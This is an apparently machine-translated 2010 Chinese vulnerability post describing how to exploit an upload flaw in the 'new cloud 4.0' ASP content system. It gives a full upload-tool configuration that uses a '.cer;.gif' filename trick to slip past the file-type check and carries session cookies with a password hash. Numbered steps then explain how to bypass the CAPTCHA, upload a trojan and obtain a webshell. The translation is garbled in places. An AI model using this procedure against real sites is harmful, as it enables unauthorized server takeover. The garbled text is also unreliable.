The new cloud 4. 0 registered upload vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201026374
Type myhack58
Reporter 佚名
Modified 2010-03-10T00:00:00


First download a


Put the following configuration file is saved as xunyun. seraph)

url=http://localhost/users/upload. asp? action=save&ChannelID=1&sType= filefield=File1 filefield2= filename=2 0 0 9 8 1 6 2 3 5 5 4. cer;. gif filename2= local=C:\Documents and Settings\seraph\ 桌面 \1.jpg local2= type=text/html type2=image/gif cookies=pma_cookie_username-1=dXsYNCw7jXS1W0oq9sYg4g%3D%3D; style_cookie=null; AJSTAT_ok_times=1; lastvisit=3 9 3 4%7C1266468378; csscolor=0; songhidden=0; NewAspUsers=UserToday=0%2C0%2C0%2C0%2C0%2C0&userlastip=1 2 7%2E0%2E0%2E1&UserGroup=%C6%D5%CD%A8%BB%E1%D4%B1&UserGrade=1&nickname=seraph&password=4283705e6519c904&focus on your chosen=0&username=seraph&LastTime=2 0 1 0% 2D3%2D9+0%3A10%3A01&userid=1; ASPSESSIONIDSASQQRBT=BKLHHGICELEMHKBMKOBHIGBA; NewAspUsers%5FOnline=UserSessionID=8 3 0 4 7 0 9; usercookies%5F1=dayarticlenum=0&daysoftnum=0&userip=1 2 7%2E0%2E0%2E1; ASPSESSIONIDQCRRTRBS=PCOHKAJCAPDEFNADGPDDMLBM name=uploadPic&value=1 4 2 1 name=Rename&value=1

Ready to do a good job, began to take SHELL.

1 find a can be registered to upload pictures of the new cloud program

2 log on after grab COOKIE content

3 open the software, load the just-saved configuration file

  1. Modify COOKIE and upload address, website

  2. Openhttp://localhost/users/upload.asp?ChannelID=1,found inside uploadpic value

  3. Double-click uploadpic,modified to just get the value,this is a CAPTCHA,to ensure that no page refresh.

  4. Local file first into your own you want to upload Trojan

8 Click on upload, if the upload fails, try to upload 2,

8 manually grab the upload address, the next round I don't have to teach.